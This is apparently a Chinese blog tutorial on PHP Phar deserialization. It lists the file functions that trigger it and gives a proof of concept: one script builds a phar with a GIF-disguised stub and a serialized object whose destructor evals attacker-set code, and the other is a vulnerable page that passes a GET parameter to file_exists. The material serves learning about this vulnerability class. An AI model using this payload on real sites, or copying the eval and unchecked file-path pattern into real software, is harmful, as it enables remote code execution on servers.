反序列化(二) (略详细)

本文详细介绍了PHP中的反序列化漏洞,特别是Phar反序列化和POP链构造。Phar反序列化涉及文件操作函数,利用条件包括文件上传和魔术方法。POP链构造则利用了面向属性编程,通过寻找程序环境中已定义的对象属性,构造具有目的性的操作链。文中还提到了反序列化漏洞的挖掘思路和相关参考资料。
摘要由CSDN通过智能技术生成

反序列化(二) (略详细)

前文讲了讲__wakeup绕过,注入对象构造方法,和session反序列化。
链接为:
https://blog.csdn.net/qq975353472/article/details/109657666

这里就讲讲剩下的两种,一个是phar反序列化(推荐先去学习phar用法),和pop链构造(重点哦)

一、Phar反序列化(个人感觉漏洞类型是文件包含+文件上传)

影响函数
fileatime / filectime / filemtime
stat / fileinode / fileowner / filegroup / fileperms
file / file_get_contents / readfile / fopen
file_exists / is_dir / is_executable / is_file / is_link / is_readable / is_writeable / is_writable
parse_ini_file
unlink

实例
index8.php

<?php
	class Mikasa{
   
			public $data = "whoami";
			public function __destruct(){
   
				eval($this->data);
			}
		}
	
	$phar = new Phar("phar.phar");
	
	$phar->startBuffering();
	
	$phar->setStub("Gif89a<?php __HALT_COMPILER();?>");
	
	$QAQ = new Mikasa();
	 
	$QAQ->data = "phpinfo()";
	
	$phar->setMetadata($QAQ);
	
	$phar->addFromString("test.txt","test");
	
	$phar->stopBuffering();

index7.php

<?php

	$a = $_GET['a'];
	class Mikasa{
   
		public $data = "whoami";
		function __destruct(){
   
			eval($this->data);
		}
	}
	
	file_exists($a);

无论是否更改生成的phar文件的后缀,都可以执行,并达到反序列化的效果(这里我是把生成的phar.phar,更改为phar.txt)

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值